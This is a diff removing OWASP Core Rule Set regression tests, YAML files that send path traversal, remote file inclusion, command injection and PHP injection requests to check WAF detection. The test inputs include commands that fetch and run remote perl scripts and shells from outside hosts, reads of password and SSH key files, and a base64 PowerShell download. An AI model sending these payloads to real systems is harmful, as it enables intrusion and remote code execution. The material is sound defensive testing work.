port: 80
uri: "/post"
version: "HTTP/1.1"
data: |
--boundary
Content-Disposition: form-data; name="flavors"
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset=utf-7
Pineapple. Pizza.
--boundary--
output:
log_contains: id "922120"
- test_title: 922120-2
desc: "Negative test: no content-transfer-encoding header should be good"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: multipart/form-data; boundary=boundary
Accept: "*/*"
method: POST
port: 80
uri: "/post"
version: "HTTP/1.1"
data: |
--boundary
Content-disposition: form-data; name="negative"
Content-Type: text/plain
This should be good as there is no content-transfer-encoding header.
--boundary--
output:
no_log_contains: id "922120"

21
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml vendored
View file

@ -1,21 +0,0 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "930100.yaml"
description: "Application attack LFI"
tests:
- test_title: 930100-1
desc: "Path Traversal Attack (/../) encoded"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
FoobarHeader: "0x5c0x2e.%00/"
uri: "/"
output:
log_contains: id "930100"

88
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml vendored
View file

@ -1,88 +0,0 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "930110.yaml"
description: "Application attacks: Local file include"
tests:
- test_title: 930110-1
desc: "Path Traversal Attack (/../)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
FoobarHeader: "/../../../././..\\ ../../etc/master.passwd"
uri: "/"
output:
log_contains: id "930110"
- test_title: 930110-2
desc: "Path Traversal Attack (/../) query string"
stages:
- stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
Host: "localhost"
X-FTW: "This should trip"
uri: "/?arg=../../../etc/passwd"
output:
log_contains: id "930110"
- test_title: 930110-3
desc: "Path Traversal Attack (/../) query string"
stages:
- stage:
input:
dest_addr: "localhost"
method: "POST"
port: 80
headers:
Host: "localhost"
uri: "/"
data: "arg=../../../etc/passwd&foo=var"
output:
log_contains: id "930110"
- test_title: 930110-4
desc: "Path Traversal Attack (/../) query string"
stages:
- stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
Host: "localhost"
uri: "/foo../1234"
output:
no_log_contains: id "930110"
- test_title: 930110-5
desc: "Path Traversal Attack (/../) query string"
stages:
- stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
Host: "localhost"
uri: "/foo.../1234"
output:
no_log_contains: id "930110"
- test_title: 930110-6
desc: "Path Traversal Attack (/../) query string"
stages:
- stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
Host: "localhost"
uri: "/..foo"
output:
no_log_contains: id "930110"

83
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml vendored
View file

@ -1,83 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 930120.yaml
tests:
- test_title: 930120-1
desc: Remote File Access Attempt (930120) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /index.php?file=News&op=../../../../../boot.ini%00
version: HTTP/1.1
output:
log_contains: id "930120"
- test_title: 930120-2
desc: Remote File Access Attempt (930120) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /index.php?file=News&op=/etc/passwd%00
version: HTTP/1.1
output:
log_contains: id "930120"
- test_title: 930120-3
desc: Remote File Access Attempt (930120) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /index.php?file=News&op=../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00
version: HTTP/1.1
output:
log_contains: id "930120"
- test_title: 930120-4
desc: "OS File Access"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
uri: "/?foo=arg&path_comp=.ssh/id_rsa"
output:
log_contains: "930120"

28
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml vendored
View file

@ -1,28 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 931100.yaml
tests:
- test_title: 931100-1
desc: Remote File Inclusion Attack (931100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php
version: HTTP/1.1
output:
log_contains: id "931100"

70
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml vendored
View file

@ -1,70 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 931110.yaml
tests:
- test_title: 931110-1
desc: Remote File Inclusion Attack (931110) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar
version: HTTP/1.1
output:
log_contains: id "931110"
- test_title: 931110-2
desc: Remote File Inclusion Attack (931110) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar
version: HTTP/1.1
output:
log_contains: id "931110"
- test_title: 931110-3
desc: Remote File Inclusion Attack (931110) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar
version: HTTP/1.1
output:
log_contains: id "931110"

127
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml vendored
View file

@ -1,127 +0,0 @@
---
meta:
author: studersi
description: None
enabled: true
name: 931120.yaml
tests:
- test_title: 931120-1
desc: Remote File Inclusion Attack (931120)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=file?
version: HTTP/1.1
output:
log_contains: id "931120"
- test_title: 931120-2
desc: Remote File Inclusion Attack (931120)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=ftp?
version: HTTP/1.1
output:
log_contains: id "931120"
- test_title: 931120-3
desc: Remote File Inclusion Attack (931120)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=ftps?
version: HTTP/1.1
output:
log_contains: id "931120"
- test_title: 931120-4
desc: Remote File Inclusion Attack (931120)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=http?
version: HTTP/1.1
output:
log_contains: id "931120"
- test_title: 931120-5
desc: Remote File Inclusion Attack (931120)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https?
version: HTTP/1.1
output:
log_contains: id "931120"
- test_title: 931120-6
desc: Remote File Inclusion Attack (931120)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https://foo.bar?
version: HTTP/1.1
output:
log_contains: id "931120"
- test_title: 931120-7
desc: Remote File Inclusion Attack (931120)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https://foo.bar?foo=bar
version: HTTP/1.1
output:
no_log_contains: id "931120"
- test_title: 931120-8
desc: Remote File Inclusion Attack (931120)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https://foo.bar&foo=bar
version: HTTP/1.1
output:
no_log_contains: id "931120"

172
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml vendored
View file

@ -1,172 +0,0 @@
---
meta:
author: studersi
description: None
enabled: true
name: 931130.yaml
tests:
- test_title: 931130-1
desc: Remote File Inclusion Attack (931130)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=file://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
- test_title: 931130-2
desc: Remote File Inclusion Attack (931130)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=ftp://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
- test_title: 931130-3
desc: Remote File Inclusion Attack (931130)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=ftps://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
- test_title: 931130-4
desc: Remote File Inclusion Attack (931130)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=http://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
- test_title: 931130-5
desc: Remote File Inclusion Attack (931130)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
- test_title: 931130-6
desc: Partial match
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://evilexample.com/
version: HTTP/1.1
output:
log_contains: id "931130"
- test_title: 931130-7
desc: Mismatching domains
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://example.com.evil.com/
version: HTTP/1.1
output:
log_contains: id "931130"
- test_title: 931130-8
desc: Mismatching ports
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://example.com:1234/
version: HTTP/1.1
output:
log_contains: id "931130"
- test_title: 931130-9
desc: Matching hosts
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://example.com/
version: HTTP/1.1
output:
no_log_contains: id "931130"
- test_title: 931130-10
desc: Matching hosts and ports
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://example.com:1234/
version: HTTP/1.1
output:
log_contains: id "931130"
- test_title: 931130-11
desc: Subdomains
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=http://www.example.com/some/path
version: HTTP/1.1
output:
no_log_contains: id "931130"

61
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932100.yaml vendored
View file

@ -1,61 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 932100.yaml
tests:
- test_title: 932100-1
desc: System Command Injection (932100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf
version: HTTP/1.0
output:
log_contains: id "932100"
- test_title: 932100-2
desc: System Command Injection (932100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php
version: HTTP/1.0
output:
log_contains: id "932100"
- # Currently this will be blocked by apache before it gets
# to CRS. as a result we need to check for 400 from Apache
# We ideally want a OR output check.
# https://github.com/CRS-support/ftw/issues/19
test_title: 932100-3
desc: CSV Injection Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
- stage:
input:
encoded_request: "UE9TVCAvaW5kZXguaHRtbCBIVFRQLzEuMQpIb3N0OiAxOTIuMTY4LjEuMjMKVXNlci1BZ2VudDogY3VybC83LjQzLjAKQWNjZXB0OiAqLyoKQ29udGVudC1MZW5ndGg6IDY0CkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkCkNvbm5lY3Rpb246IGNsb3NlCgpkPTE7MjszOzQ7NVxuMTtAU1VNKDErMSkqY21kfCcgcG93ZXJzaGVsbCBJRVgod2dldCAwci5wZS9wKSdcIUEwOzM="
output:
status: [403, 400]

2519
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml vendored
View file

File diff suppressed because it is too large Load diff

55
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml vendored
View file

@ -1,55 +0,0 @@
---
meta:
author: theMiddle
description: RCE Bypass
enabled: true
name: 932200.yaml
tests:
- test_title: 932200-1
desc: globbing patterns
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?host=www.google.com;/bin/ca?+/et*/passwd
version: HTTP/1.0
output:
log_contains: id "932200"
- test_title: 932200-2
desc: uninitialized variable
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?host=www.google.com;cat+/etc/%24%7Ba%7Dpasswd
version: HTTP/1.0
output:
log_contains: id "932200"
- test_title: 932200-3
desc: bash function
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?host=www.google.com;cat+/etc/%24%28echo%29passwd
version: HTTP/1.0
output:
log_contains: id "932200"

49
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml vendored
View file

@ -1,49 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 933100.yaml
tests:
- test_title: 933100-1
desc: PHP Injection Attack (933100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=<?exec('wget%20http://r57.biz/r57.txt%20-O
version: HTTP/1.0
output:
log_contains: id "933100"
- test_title: 933100-2
desc: PHP Injection Attack (933100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by5wb2Rnb3J6Lm9yZy96dW8vZWxlbi9pbmRleC5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT48P3BocA%3D%3D%5C%22)%2C%20FILE_APPEND)%3B%20%3F%3E
version: HTTP/1.0
output:
log_contains: id "933100"

327
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml vendored
View file

@ -1,327 +0,0 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933110.yaml
tests:
- test_title: 933110-1
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
output:
no_log_contains: id "933110"
- test_title: 933110-2
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: a.php
port: 80
uri: /upload1
output:
log_contains: id "933110"
- test_title: 933110-3
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X_Filename: a.php
port: 80
uri: /upload2
output:
log_contains: id "933110"
- test_title: 933110-4
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: a.php
port: 80
uri: /upload3
output:
log_contains: id "933110"
- test_title: 933110-5
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: a.php..
port: 80
uri: /upload4
output:
log_contains: id "933110"
- test_title: 933110-6
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: a.phtml
port: 80
uri: /upload
output:
log_contains: id "933110"
- test_title: 933110-7
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fda.phtml......
port: 80
uri: /upload
output:
log_contains: id "933110"
- test_title: 933110-8
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fda.php5
port: 80
uri: /upload
output:
log_contains: id "933110"
- test_title: 933110-9
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fda.php5
port: 80
uri: /upload
output:
log_contains: id "933110"
- test_title: 933110-10
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fda.php7
port: 80
uri: /upload
output:
log_contains: id "933110"
- test_title: 933110-11
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
output:
no_log_contains: id "933110"
- test_title: 933110-12
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: fda.php5...
port: 80
uri: /upload5
output:
log_contains: id "933110"
- test_title: 933110-13
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X_Filename: fda.php5...
port: 80
uri: /upload6
output:
log_contains: id "933110"
- test_title: 933110-14
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X_Filename: fthisfewfda.php.
port: 80
uri: /upload7
output:
log_contains: id "933110"
- test_title: 933110-15
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fthi/sfewfda.php.............
port: 80
uri: /upload8
output:
log_contains: id "933110"
- test_title: 933110-16
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fthi/sfewfda.php.............
port: 80
uri: /upload
output:
log_contains: id "933110"
- test_title: 933110-17
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-File-Name: fthi/sfewfda.php907.............
port: 80
uri: /upload
output:
log_contains: id "933110"
- test_title: 933110-18
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X-Filename: fthi/sfewfda.phtml
port: 80
uri: /upload
output:
log_contains: id "933110"
- test_title: 933110-19
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X_Filename: fthi/sfewfda.phtml987...
port: 80
uri: /
output:
no_log_contains: id "933110"
- test_title: 933110-20
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X.Filename: a.php
port: 80
uri: /upload2
output:
log_contains: id "933110"
- test_title: 933110-21
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X.Filename: fda.php5...
port: 80
uri: /upload6
output:
log_contains: id "933110"
- test_title: 933110-22
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X.Filename: fthisfewfda.php.
port: 80
uri: /upload7
output:
log_contains: id "933110"
- test_title: 933110-23
desc: PHP script uploads
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
X.Filename: fthi/sfewfda.phtml987...
port: 80
uri: /
output:
no_log_contains: id "933110"

22
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml vendored
View file

@ -1,22 +0,0 @@
---
meta:
author: "Christian S.J. Peron"
description: None
enabled: true
name: 933120.yaml
tests:
- test_title: 933120-1
desc: "PHP Injection Attack: Configuration Directive"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=session.bug_compat_42%3dtrue"
version: HTTP/1.0
output:
log_contains: id "933120"

85
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml vendored
View file

@ -1,85 +0,0 @@
---
meta:
author: csanders-git
description: Tests functionality of 933130
enabled: true
name: 933130.yaml
tests:
- test_title: 933130-1
desc: Basic Request nothing should trigger
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
output:
no_log_contains: id "933130"
- test_title: 933130-2
desc: Trigger a basic request
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_SERVER['test'];
output:
log_contains: id "933130"
- test_title: 933130-3
desc: Non-Server Request
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_SE%20RVER['test'];
output:
no_log_contains: id "933130"
- test_title: 933130-4
desc: SERVER request URLEncoded
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_%53ERVER['test'];
output:
log_contains: id "933130"
- test_title: 933130-5
desc: SERVER request URLEncoded
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?%24_COOKIE=value;
output:
log_contains: id "933130"
- test_title: 933130-6
desc: SERVER index listed with obfuscated SERVER
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$_%53%20ERVER['request_uri'];
output:
no_log_contains: id "933130"

46
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml vendored
View file

@ -1,46 +0,0 @@
---
meta:
author: csanders-git
